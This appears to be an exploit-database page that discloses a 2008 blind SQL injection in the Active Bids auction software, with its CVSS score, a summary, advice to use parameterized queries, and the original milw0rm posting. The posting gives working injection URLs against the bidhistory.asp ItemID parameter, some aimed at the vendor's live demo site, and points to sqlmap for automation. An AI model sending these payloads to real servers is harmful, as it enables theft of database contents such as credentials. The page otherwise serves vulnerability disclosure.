header-logo
Suggest Exploit
vendor:
Active Bids
by:
Mountassif Moad
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Active Bids
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Remote Blind SQL Injection Vulnerability

Active Bids, a software developed by www.activewebsoftwares.com, is vulnerable to a Remote Blind SQL Injection vulnerability. This vulnerability can be exploited by sending a maliciously crafted HTTP request to the vulnerable server. An attacker can use this vulnerability to gain access to sensitive information stored in the database, such as usernames and passwords. The vulnerability can be exploited by sending a maliciously crafted HTTP request to the vulnerable server, such as http://site.il/activebids/bidhistory.asp?ItemID=354%20and%201=1 and http://site.il/activebids/bidhistory.asp?ItemID=354%20and%201=0. An attacker can use this vulnerability to gain access to sensitive information stored in the database, such as usernames and passwords.

Mitigation:

Developers should ensure that user input is properly sanitized and validated before being used in a SQL query. Additionally, developers should use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

 [~]Tybe     : Remote Blind SQL Injection Vulnerability
   
 [~]Vendor   : www.activewebsoftwares.com
   
 [~]Software : Active Bids
   
 [~]author   : Mountassif Moad



http://site.il/activebids/bidhistory.asp?ItemID=354%20and%201=1

http://site.il/activebids/bidhistory.asp?ItemID=354%20and%201=0

Demo :

http://www.activewebsoftwares.com/demoactivebids/bidhistory.asp?ItemID=354%20and%201=1

http://www.activewebsoftwares.com/demoactivebids/bidhistory.asp?ItemID=354%20and%201=0


# you can exploting the bug white blind sql automatic toolz such as sqlmap or ...

# milw0rm.com [2008-11-29]

Navigation

Suggest Exploit

Services By CQR